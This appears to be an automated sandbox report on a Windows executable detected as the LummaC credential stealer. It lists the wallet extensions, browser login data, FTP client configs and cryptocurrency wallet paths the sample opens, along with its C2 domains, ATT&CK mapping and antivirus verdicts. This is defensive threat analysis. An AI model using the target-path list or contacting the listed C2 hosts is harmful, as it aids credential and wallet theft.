                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: Yara matchFile source: 00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1599170541.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1624031849.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1599366163.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1626918311.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1599230927.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: hx0wBsOjkQ.exe PID: 8048, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: hx0wBsOjkQ.exe PID: 8048, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		44
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Archive Collected Data                		21
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory851
                Security Software Discovery                		Remote Desktop Protocol41
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager44
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials223
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                hx0wBsOjkQ.exe54%VirustotalBrowse
                hx0wBsOjkQ.exe58%ReversingLabsWin32.Trojan.CryptBot
                hx0wBsOjkQ.exe100%AviraTR/Crypt.XPACK.Gen
                hx0wBsOjkQ.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://lev-tolstoi.com/apipt100%Avira URL Cloudmalware
                https://lev-tolstoi.com/m/100%Avira URL Cloudmalware
                https://lev-tolstoi.com:443/apirofiles/76561199724331900100%Avira URL Cloudmalware
                https://lev-tolstoi.com/piA100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apill100%Avira URL Cloudmalware
                https://prisonyfork.buzz:443/apia100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apis100%Avira URL Cloudmalware
                https://lev-tolstoi.com/9100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apiaLxz100%Avira URL Cloudmalware
                https://scentniej.buzz:443/api100%Avira URL Cloudmalware
                https://cashfuzysao.buzz:443/api100%Avira URL Cloudmalware
                https://hummskitnj.buzz:443/api100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                		23.55.153.106
                		truefalse
                  		high
                  lev-tolstoi.com
                  		172.67.157.254
                  		truefalse
                    		high
                    cashfuzysao.buzz
                    		unknown
                    		unknownfalse
                      		high
                      scentniej.buzz
                      		unknown
                      		unknownfalse
                        		high
                        inherineau.buzz
                        		unknown
                        		unknownfalse
                          		high
                          prisonyfork.buzz
                          		unknown
                          		unknownfalse
                            		high
                            rebuildeso.buzz
                            		unknown
                            		unknownfalse
                              		high
                              appliacnesot.buzz
                              		unknown
                              		unknownfalse
                                		high
                                hummskitnj.buzz
                                		unknown
                                		unknownfalse
                                  		high
                                  mindhandru.buzz
                                  		unknown
                                  		unknownfalse
                                    		high
                                    screwamusresz.buzz
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      scentniej.buzzfalse
                                        		high
                                        https://steamcommunity.com/profiles/76561199724331900false
                                          		high
                                          rebuildeso.buzzfalse
                                            		high
                                            appliacnesot.buzzfalse
                                              		high
                                              screwamusresz.buzzfalse
                                                		high
                                                cashfuzysao.buzzfalse
                                                  		high
                                                  inherineau.buzzfalse
                                                    		high
                                                    https://lev-tolstoi.com/apifalse
                                                      		high
                                                      hummskitnj.buzzfalse
                                                        		high
                                                        mindhandru.buzzfalse
                                                          		high
                                                          prisonyfork.buzzfalse
                                                            		high

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pnghx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/chrome_newtabhx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/ac/?q=hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amphx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://steamcommunity.com/?subsection=broadcastshx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://lev-tolstoi.com:443/apirofiles/76561199724331900hx0wBsOjkQ.exe, 00000000.00000002.1673742160.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599230927.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1672776832.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://store.steampowered.com/subscriber_agreement/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpghx0wBsOjkQ.exe, 00000000.00000003.1592981595.00000000057D3000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.valvesoftware.com/legal.htmhx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enhx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://lev-tolstoi.com/apipthx0wBsOjkQ.exe, 00000000.00000003.1517343643.0000000000E20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700hx0wBsOjkQ.exe, 00000000.00000003.1592981595.00000000057D3000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackhx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englhx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englishx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbChx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&ctahx0wBsOjkQ.exe, 00000000.00000003.1592981595.00000000057D3000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRihx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://lev-tolstoi.com/piAhx0wBsOjkQ.exe, 00000000.00000002.1673905575.0000000000E61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://lev-tolstoi.com/m/hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enhx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://lev-tolstoi.com/hx0wBsOjkQ.exe, 00000000.00000003.1593068809.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1566379520.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599605647.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495521986.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495218913.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1623931109.0000000000E5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://store.steampowered.com/privacy_agreement/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://steamcommunity.com:443/profiles/76561199724331900hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://store.steampowered.com/points/shop/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://ocsp.rootca1.amazontrust.com0:hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&ahx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.ecosia.org/newtab/hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
